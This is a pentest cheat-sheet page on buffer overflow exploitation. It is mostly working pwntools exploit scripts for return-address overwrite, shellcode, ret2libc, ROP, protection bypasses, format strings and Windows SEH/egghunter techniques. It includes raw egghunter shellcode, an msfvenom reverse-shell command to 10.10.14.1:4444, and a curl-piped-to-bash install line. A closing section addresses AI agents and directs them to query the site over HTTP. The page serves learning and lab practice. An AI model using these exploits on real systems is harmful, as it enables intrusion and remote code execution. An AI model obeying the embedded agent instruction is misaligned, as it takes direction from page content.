# Buffer Overflow

## Overview

Buffer overflows occur when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can lead to crashes, data corruption, or arbitrary code execution.

## Types of Buffer Overflows

### Stack-Based Buffer Overflow

```
+------------------+  High Memory
|   Command Args   |
+------------------+
|  Environment     |
+------------------+
|     Stack        |  <- Grows downward
|  +------------+  |
|  | Local Vars |  |
|  +------------+  |
|  | Saved EBP  |  |
|  +------------+  |
|  | Return Addr|  |  <- TARGET
|  +------------+  |
|  | Parameters |  |
|  +------------+  |
+------------------+
|      Heap        |  <- Grows upward
+------------------+
|      BSS         |
+------------------+
|      Data        |
+------------------+
|      Text        |
+------------------+  Low Memory
```

### Heap-Based Buffer Overflow

```
# Heap overflows corrupt heap metadata or adjacent heap objects
# Can lead to arbitrary write primitives
# More complex to exploit but still dangerous
```

## Finding Buffer Overflows

### Fuzzing

```bash
# Simple fuzzing with pattern
python3 -c "print('A' * 1000)" | ./vulnerable_program

# Using AFL++
afl-fuzz -i input/ -o output/ -- ./vulnerable_program @@

# Using Boofuzz (network)
# See boofuzz documentation for protocol-specific fuzzing
```

### Pattern Creation

```bash
# Metasploit pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

# Find offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41326341

# Python alternative
from pwn import *
cyclic(1000)  # Create pattern
cyclic_find(0x61616174)  # Find offset
```

### GDB Analysis

```bash
# Run program in GDB
gdb ./vulnerable

# Set breakpoint at vulnerable function
b vulnerable_function

# Run with input
run $(python3 -c "print('A'*100)")

# Check registers after crash
info registers

# Examine stack
x/100x $esp

# Check memory protections
checksec
```

## Exploitation Techniques

### Classic Return Address Overwrite

```python
#!/usr/bin/env python3
from pwn import *

# Configuration
binary = './vulnerable'
elf = ELF(binary)

# Calculate offset (found via pattern)
offset = 76

# Build payload
payload = b'A' * offset           # Padding to reach return address
payload += p32(0xdeadbeef)        # Overwrite return address

# Run exploit
p = process(binary)
p.sendline(payload)
p.interactive()
```

### Return to Shellcode

```python
#!/usr/bin/env python3
from pwn import *

binary = './vulnerable'
offset = 76

# Shellcode (Linux x86 execve /bin/sh)
shellcode = asm(shellcraft.sh())

# NOP sled + shellcode
nop_sled = b'\x90' * 100
shellcode_addr = 0xbffff000  # Address where shellcode lands (find via debugging)

payload = nop_sled
payload += shellcode
payload += b'A' * (offset - len(payload))
payload += p32(shellcode_addr)

p = process(binary)
p.sendline(payload)
p.interactive()
```

### Return to libc (ret2libc)

```python
#!/usr/bin/env python3
from pwn import *

# Bypass NX (non-executable stack) by returning to libc functions

binary = './vulnerable'
elf = ELF(binary)
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# Find libc base (with ASLR disabled or leaked)
# For demonstration, ASLR disabled
libc_base = 0xf7c00000

# Calculate addresses
system_addr = libc_base + libc.symbols['system']
exit_addr = libc_base + libc.symbols['exit']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

offset = 76

# Payload: system("/bin/sh")
payload = b'A' * offset
payload += p32(system_addr)   # Return to system()
payload += p32(exit_addr)     # Return address after system (clean exit)
payload += p32(binsh_addr)    # Argument to system()

p = process(binary)
p.sendline(payload)
p.interactive()
```

### Return Oriented Programming (ROP)

```python
#!/usr/bin/env python3
from pwn import *

# ROP chains use existing code gadgets to bypass DEP/NX

binary = './vulnerable'
elf = ELF(binary)
rop = ROP(elf)

# Find gadgets
# ropper -f ./vulnerable
# ROPgadget --binary ./vulnerable

# Example: mprotect to make stack executable, then jump to shellcode
# Or: execve("/bin/sh", NULL, NULL)

offset = 76

# Using pwntools ROP
rop.raw(0x41414141)  # pop gadget
rop.call(elf.plt['puts'], [elf.got['puts']])  # Leak libc address
rop.call(elf.symbols['main'])  # Return to main for second stage

payload = b'A' * offset + rop.chain()

p = process(binary)
p.sendline(payload)

# Parse leaked address
leaked = u32(p.recv(4))
log.info(f"Leaked puts: {hex(leaked)}")
```

### 64-bit Exploitation

```python
#!/usr/bin/env python3
from pwn import *

# 64-bit uses different calling convention
# First 6 args: RDI, RSI, RDX, RCX, R8, R9
# Need gadgets to control these registers

binary = './vulnerable64'
elf = ELF(binary)
rop = ROP(elf)

# Find gadgets
# pop rdi; ret
pop_rdi = 0x401234

offset = 72  # 64-bit typically has different offsets

# Call system("/bin/sh") in 64-bit
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = 0x7ffff7c00000  # Example, needs to be leaked

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

payload = b'A' * offset
payload += p64(pop_rdi)       # pop rdi; ret
payload += p64(binsh_addr)    # /bin/sh string
payload += p64(system_addr)   # system()

p = process(binary)
p.sendline(payload)
p.interactive()
```

## Bypassing Protections

### ASLR Bypass

```python
# Address Space Layout Randomization
# Randomizes stack, heap, libraries, and sometimes binary

# Techniques:
# 1. Information leak - leak an address to calculate base
# 2. Brute force (32-bit has limited entropy)
# 3. Return to PLT (not randomized in partial RELRO)
# 4. ret2plt to leak GOT entries

# Example: Leak libc address via puts
from pwn import *

binary = './vulnerable'
elf = ELF(binary)
rop = ROP(elf)

# Stage 1: Leak libc address
payload1 = b'A' * offset
payload1 += p64(pop_rdi)
payload1 += p64(elf.got['puts'])  # Argument: GOT entry of puts
payload1 += p64(elf.plt['puts'])  # Call puts to print address
payload1 += p64(elf.symbols['main'])  # Return to main

p = process(binary)
p.sendline(payload1)
p.recvuntil(b'...')  # Receive until leak

leaked_puts = u64(p.recv(6).ljust(8, b'\x00'))
log.info(f"Leaked puts: {hex(leaked_puts)}")

# Calculate libc base
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = leaked_puts - libc.symbols['puts']
```

### Stack Canary Bypass

```python
# Stack canaries are random values placed before return address
# Program crashes if canary is modified

# Techniques:
# 1. Information leak to get canary value
# 2. Brute force (byte by byte in forking servers)
# 3. Overwrite only variables before canary (for different attacks)

# Example: Leak canary via format string
payload = b'%15$p'  # Leak canary position (varies)
p.sendline(payload)
canary = int(p.recv().strip(), 16)

# Then include correct canary in overflow
payload = b'A' * offset_to_canary
payload += p64(canary)
payload += b'A' * 8  # Saved RBP
payload += p64(target_address)
```

### NX/DEP Bypass

```bash
# Non-Executable stack prevents shellcode execution
# Use return-to-libc or ROP instead

# Check if NX is enabled
checksec ./vulnerable
# Output: NX enabled

# Bypass options:
# 1. ret2libc (call existing functions)
# 2. ROP (chain gadgets)
# 3. ret2plt
# 4. mprotect() to make memory executable
```

### PIE Bypass

```python
# Position Independent Executable
# Binary loaded at random base address

# Need to leak binary base address
# Or use partial overwrite (only overwrite lower bytes)

# Partial overwrite example (if ASLR entropy allows)
# Overwrite only last 2 bytes of return address
payload = b'A' * offset
payload += b'\x00\x12'  # Only change last 2 bytes to 0x1200

# Or leak binary address from stack
```

## Format String Attacks

```python
# Format string bugs can read/write arbitrary memory

# Reading memory
payload = b'AAAA' + b'.%x' * 20  # Leak stack values
payload = b'%7$s' + p64(address)  # Read from specific address

# Writing memory (overwrite GOT entry)
# Write small value
payload = b'%100c%7$n' + p64(target_addr)  # Write 100 to target_addr

# Write larger values (byte by byte)
from pwntools import fmtstr
writes = {target_addr: desired_value}
payload = fmtstr.fmtstr_payload(offset, writes)
```

## Windows Buffer Overflows

### Finding Bad Characters

```python
# Bad chars break the payload (null bytes, newlines, etc.)
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    b"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    # ... continue through 0xff
)
# Send and check which bytes are mangled in memory
```

### JMP ESP Technique

```python
# Windows: find JMP ESP in loaded DLLs
# Use mona.py in Immunity Debugger

# !mona jmp -r esp -cpb "\x00\x0a\x0d"

# Build payload
import struct

offset = 2003
jmp_esp = struct.pack('<I', 0x625011af)  # Address of JMP ESP
nops = b'\x90' * 16

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f python -b "\x00\x0a\x0d"
shellcode = b"..."

payload = b'A' * offset
payload += jmp_esp
payload += nops
payload += shellcode
```

### SEH Overwrite

```python
# Structured Exception Handler overwrite
# Windows-specific technique

# Find POP POP RET gadget
# !mona seh -cpb "\x00\x0a\x0d"

# Payload structure:
# [buffer][nSEH][SEH][shellcode]
# nSEH: short jump over SEH to shellcode
# SEH: POP POP RET gadget

nseh = b'\xeb\x06\x90\x90'  # JMP short +6
seh = struct.pack('<I', 0x10001234)  # POP POP RET

payload = b'A' * offset
payload += nseh
payload += seh
payload += b'\x90' * 16
payload += shellcode
```

### Egghunter

```python
# Egghunter: small shellcode that searches memory for larger payload
# Useful when buffer space is limited

# Egg: unique marker before main shellcode
egg = b'w00tw00t'

# Egghunter shellcode (~32 bytes)
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# First stage (small buffer)
payload1 = b'A' * offset
payload1 += jmp_esp
payload1 += egghunter

# Second stage (placed elsewhere in memory)
payload2 = egg + egg + main_shellcode
```

## Useful Tools

```bash
# Pwntools (Python)
pip install pwntools

# GDB + GEF/PEDA/pwndbg
# GEF
bash -c "$(curl -fsSL https://gef.blah.cat/sh)"

# pwndbg
git clone https://github.com/pwndbg/pwndbg
cd pwndbg && ./setup.sh

# ROPgadget
pip install ropgadget
ROPgadget --binary ./vulnerable

# Ropper
pip install ropper
ropper -f ./vulnerable

# checksec
checksec --file=./vulnerable

# one_gadget (find execve gadgets in libc)
gem install one_gadget
one_gadget /lib/x86_64-linux-gnu/libc.so.6

# mona.py (Windows/Immunity Debugger)
# https://github.com/corelan/mona
```

## Debugging Commands

```bash
# GDB with pwndbg
gdb ./vulnerable
pwndbg> checksec
pwndbg> cyclic 200
pwndbg> run
pwndbg> cyclic -l $rsp

# GDB with GEF
gef> pattern create 200
gef> pattern search

# Find string in binary
strings -a -t x ./vulnerable | grep "/bin/sh"

# Find gadgets
objdump -d ./vulnerable | grep -A2 "pop"
```

## Practice Resources

* [Protostar](https://exploit.education/protostar/)
* [Phoenix](https://exploit.education/phoenix/)
* [ROP Emporium](https://ropemporium.com/)
* [pwnable.kr](http://pwnable.kr/)
* [pwnable.tw](https://pwnable.tw/)
* [Nightmare Course](https://guyinatuxedo.github.io/)
* [LiveOverflow Binary Exploitation](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/exploitation/buffer-overflow.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
